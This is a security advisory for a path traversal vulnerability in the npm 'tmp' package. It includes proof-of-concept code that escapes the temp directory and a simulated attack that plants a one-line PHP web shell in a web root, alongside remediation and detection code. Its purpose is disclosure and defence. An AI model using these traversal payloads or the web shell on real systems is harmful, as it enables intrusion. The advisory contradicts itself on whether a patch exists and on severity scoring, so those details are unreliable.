GHSA-PH9P-34F9-6G65
Vulnerability from github – Published: 2026-05-27 00:34 – Updated: 2026-05-27 00:34
Summary
The tmp npm package contains a path traversal vulnerability that allows escaping the intended temporary directory when untrusted data flows into the prefix, postfix, or dir options. By embedding traversal sequences (e.g., ../) or path separators in these parameters, attackers can cause files to be created outside the configured temporary base directory at attacker-controlled locations with the privileges of the running process. This vulnerability affects applications that pass user-controlled data to tmp's file/directory creation functions without proper input sanitization.
Details
Root Cause: The vulnerability exists in tmp's path construction logic where user-supplied options are directly concatenated into file paths without sanitization or validation.
Technical Flow:
1. Filename Construction: tmp builds filenames as <prefix>-<pid>-<random>-<postfix>
2. Path Composition: Final path computed as path.join(tmpDir, opts.dir, name)
3. Path Normalization: Node.js path.join() normalizes traversal sequences, allowing escape
4. File Creation: File created at the resulting (potentially escaped) path
Vulnerable Pattern:
```javascript
// In tmp package internals
const name = `${opts.prefix || ''}-${process.pid}-${randomString}-${opts.postfix || ''}`;
const finalPath = path.join(tmpDir, opts.dir || '', name);
// No validation that finalPath remains within tmpDir
```
Path Traversal Mechanics:
- prefix/postfix traversal: ../../../evil in prefix escapes directory structure
- Absolute path bypass: If opts.dir is absolute, path.join() ignores tmpDir completely
- Normalization exploitation: path.join() resolves ../ sequences regardless of surrounding text
- Cross-platform impact: Works on Windows (..\\), Unix (../), and mixed path systems
Key Vulnerability Points:
- No input validation on prefix, postfix, or dir parameters
- Direct use of user input in path construction
- Reliance on path.join() normalization without containment checks
- Missing post-construction validation that final path remains within intended directory
PoC
Basic Path Traversal via prefix:
```javascript
const tmp = require('tmp');
const path = require('path');
const fs = require('fs');

// Create a controlled base directory
const baseDir = fs.mkdtempSync('/tmp/safe-base-');
console.log('Base directory:', baseDir);

// Escape via prefix
tmp.file({
  tmpdir: baseDir,
  prefix: '../escaped'
}, (err, filepath, fd, cleanup) => {
  if (err) throw err;
  console.log('Created file:', filepath);
  console.log('Relative to base:', path.relative(baseDir, filepath));
  // Output shows: ../escaped-<pid>-<random>
  cleanup();
});
```
Directory Escape via postfix:
```javascript
tmp.file({
  tmpdir: baseDir,
  postfix: '/../../pwned.txt'
}, (err, filepath, fd, cleanup) => {
  if (err) throw err;
  console.log('Escaped file:', filepath);
  console.log('Escaped outside base:', !filepath.startsWith(baseDir));
  cleanup();
});
```
Absolute Path Bypass via dir:
```javascript
tmp.file({
  tmpdir: '/safe/tmp/dir',
  dir: '/tmp/evil-location',
  prefix: 'bypassed'
}, (err, filepath, fd, cleanup) => {
  if (err) throw err;
  console.log('Bypassed to:', filepath);
  // File created in /tmp/evil-location instead of /safe/tmp/dir
  cleanup();
});
```
Advanced Multi-Vector Attack:
```javascript
const maliciousOpts = {
  tmpdir: '/app/safe-tmp',
  dir: '../../../tmp',          // Escape base
  prefix: '../sensitive-area/', // Further traversal
  postfix: 'malicious.config'   // Controlled filename
};

tmp.file(maliciousOpts, (err, filepath, fd, cleanup) => {
  // Results in file creation at: /tmp/sensitive-area/malicious.config
  console.log('Final malicious path:', filepath);
  cleanup();
});
```
Real-World Attack Simulation:
```javascript
// Simulate web API that accepts user file prefix
function createUserTempFile(userPrefix, content) {
  return new Promise((resolve, reject) => {
    tmp.file({ prefix: userPrefix }, (err, path, fd, cleanup) => {
      if (err) return reject(err);
      fs.writeSync(fd, content);
      console.log('User file created at:', path);
      resolve({ path, cleanup });
    });
  });
}

// Attacker input
const attackerPrefix = '../../../var/www/html/backdoor';
createUserTempFile(attackerPrefix, '<?php system($_GET["cmd"]); ?>');
// Creates PHP backdoor in web root instead of temp directory
```
Impact
Arbitrary File Creation:
- Files created outside intended temporary directories
- Attacker control over file placement location
- Potential to overwrite existing files (depending on creation flags)
- Cross-platform exploitation capability
Attack Scenarios:
1. Web Application Configuration Poisoning:
   - User uploads file with malicious prefix/postfix
   - tmp creates "temporary" file in application configuration directory
   - Malicious configuration loaded on next application restart
2. Cache Poisoning:
   - Application caches user content using tmp
   - Attacker escapes to cache directory of different user/tenant
   - Poisoned cache serves malicious content to other users
3. Build Pipeline Compromise:
   - CI/CD system processes user PRs with tmp usage
   - Malicious prefix escapes to build output directories
   - Compromised build artifacts deployed to production
4. Container Escape Attempt:
   - Containerized application uses tmp with user input
   - Attacker attempts to escape container temp restrictions
   - Files created in host-mapped volumes or sensitive container areas
5. Multi-Tenant Service Bypass:
   - SaaS platform isolates tenants using separate tmp directories
   - Tenant A escapes their tmp space to tenant B's area
   - Cross-tenant data access and potential privilege escalation
Business Impact:
- Data Integrity: Unauthorized file placement can corrupt application state
- Service Disruption: Files in wrong locations may break application functionality
- Security Bypass: Escape temporary isolation boundaries
- Compliance Violations: Files containing sensitive data placed in uncontrolled locations
Affected Products
- Ecosystem: npm
- Package name: tmp
- Repository: github.com/raszi/node-tmp
- Affected versions: All versions with vulnerable path construction logic
- Patched versions: None currently available
Component Impact:
- tmp.file() function - vulnerable to prefix/postfix/dir traversal
- tmp.dir() function - vulnerable to same parameter manipulation
- tmp.tmpName() function - if using affected path construction
Severity: High
CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)
CWE Classification:
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)
Remediation
Input Validation and Sanitization:
- Sanitize prefix/postfix:
```javascript
const path = require('path'); // shared by the helpers in this section

function sanitizePrefix(prefix) {
  if (!prefix) return '';
  // Keep only the last path component, then replace dots and separators
  return path.basename(String(prefix)).replace(/[\.\/\\]/g, '-');
}

function sanitizePostfix(postfix) {
  if (!postfix) return '';
  // Allow only safe characters
  return String(postfix).replace(/[^A-Za-z0-9._-]/g, '');
}
```
- Validate dir parameter:
```javascript
function validateDir(dir, baseDir) {
  if (!dir) return '';
  // Reject absolute paths
  if (path.isAbsolute(dir)) {
    throw new Error('Absolute paths not allowed for dir option');
  }
  // Resolve and check containment
  const resolved = path.resolve(baseDir, dir);
  const relative = path.relative(baseDir, resolved);
  if (relative.startsWith('..') || path.isAbsolute(relative)) {
    throw new Error('Dir option escapes base directory');
  }
  return dir;
}
```
- Post-construction path validation:
```javascript
function validateFinalPath(finalPath, baseDir) {
  const resolved = path.resolve(finalPath);
  const relative = path.relative(path.resolve(baseDir), resolved);
  if (relative.startsWith('..') || path.isAbsolute(relative)) {
    throw new Error('Generated path escapes temporary directory');
  }
  return resolved;
}
```
Secure Implementation Pattern:
```javascript
const tmp = require('tmp');
const os = require('os');

function createTempFile(options, callback) {
  const opts = { ...options };
  // Default the base directory so the containment checks always have a reference
  opts.tmpdir = opts.tmpdir || os.tmpdir();
  // Sanitize inputs
  opts.prefix = sanitizePrefix(opts.prefix);
  opts.postfix = sanitizePostfix(opts.postfix);
  opts.dir = validateDir(opts.dir, opts.tmpdir);
  // Create with sanitized options
  return tmp.file(opts, (err, filePath, fd, cleanup) => {
    if (err) return callback(err);
    // Validate final path
    try {
      validateFinalPath(filePath, opts.tmpdir);
    } catch (validationErr) {
      cleanup();
      return callback(validationErr);
    }
    callback(null, filePath, fd, cleanup);
  });
}
```
Workarounds
For Application Developers:
- Input Sanitization:
```javascript
const path = require('path');
const tmp = require('tmp');

// Sanitize before passing to tmp
function safeTmpFile(userOptions, callback) {
  const safeOpts = {
    ...userOptions,
    prefix: userOptions.prefix ? path.basename(userOptions.prefix) : undefined,
    postfix: userOptions.postfix ? userOptions.postfix.replace(/[^A-Za-z0-9._-]/g, '') : undefined,
    dir: undefined // Don't allow user-controlled dir
  };
  return tmp.file(safeOpts, callback);
}
```
- Path Validation:
```javascript
function validateTmpPath(tmpPath, expectedBase) {
  const relativePath = path.relative(expectedBase, tmpPath);
  if (relativePath.startsWith('..') || path.isAbsolute(relativePath)) {
    throw new Error('Temporary file path escaped base directory');
  }
  return tmpPath;
}
```
- Restricted Usage:
```javascript
// Only use tmp with known-safe, literal values
tmp.file({ prefix: 'app-temp-', postfix: '.tmp' }, callback);
// Never: tmp.file({ prefix: userInput }, callback);
```
For Security Teams:
- Code Review Patterns:
```bash
# Search for dangerous tmp usage
grep -r "tmp\.file.*prefix.*req\|tmp\.file.*postfix.*req" .
grep -r "tmp\.dir.*opts\|tmp\.file.*opts" .
```
- Runtime Monitoring:
```javascript
// Monitor for files created outside expected temp areas
const tmp = require('tmp');
const os = require('os');
const path = require('path');

const originalFile = tmp.file;
tmp.file = function (options, callback) {
  // tmp also accepts tmp.file(callback); normalize that form first
  if (typeof options === 'function') { callback = options; options = {}; }
  // Fall back to the OS default so calls without tmpdir are checked too
  const base = path.resolve((options && options.tmpdir) || os.tmpdir());
  return originalFile.call(tmp, options, (err, filePath, fd, cleanup) => {
    if (!err) {
      const relative = path.relative(base, path.resolve(filePath));
      if (relative.startsWith('..') || path.isAbsolute(relative)) {
        console.warn('Path traversal detected:', filePath);
      }
    }
    return callback(err, filePath, fd, cleanup);
  });
};
```
Detection and Monitoring
Static Analysis:
- Scan for tmp usage with user-controlled input
- Identify unsanitized parameter passing to tmp functions
- Review file creation patterns in temporary directories
Runtime Detection:
```javascript
// Log suspicious tmp operations
const path = require('path');

function monitorTmpUsage() {
  const tmp = require('tmp');
  const originalTmpFile = tmp.file;
  tmp.file = function (options = {}, callback) {
    // tmp also accepts tmp.file(callback); normalize before inspecting options
    if (typeof options === 'function') { callback = options; options = {}; }
    // Check for suspicious patterns: traversal or a separator in prefix/postfix, absolute dir
    const hasTraversal = (v) => typeof v === 'string' && /\.\.|[\/\\]/.test(v);
    const suspicious = [
      hasTraversal(options.prefix),
      hasTraversal(options.postfix),
      typeof options.dir === 'string' && path.isAbsolute(options.dir)
    ].some(Boolean);
    if (suspicious) {
      console.warn('Suspicious tmp usage detected:', options);
    }
    return originalTmpFile.call(this, options, callback);
  };
}
```
File System Monitoring:
```bash
# Monitor file creation outside expected temp directories
inotifywait -m -r --format '%w%f %e' /tmp /var/tmp | while read -r file event; do
  if [[ "$event" == *"CREATE"* && "$file" != /tmp/tmp-* ]]; then
    echo "Unexpected file creation: $file"
  fi
done
```
Acknowledgements
Reported by: Mapta / BugBunny_ai
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "tmp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.2.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44705"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-27T00:34:06Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"id": "GHSA-ph9p-34f9-6g65",
"modified": "2026-05-27T00:34:06Z",
"published": "2026-05-27T00:34:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-ph9p-34f9-6g65"
},
{
"type": "WEB",
"url": "https://github.com/raszi/node-tmp/commit/efa4a06f24374797ae32ab2b6ae39b7a611ae429"
},
{
"type": "PACKAGE",
"url": "https://github.com/raszi/node-tmp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "tmp has Path Traversal via unsanitized prefix/postfix that enables directory escape"
}
Sightings
| Author | Source | Type | Date | Other |
|---|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.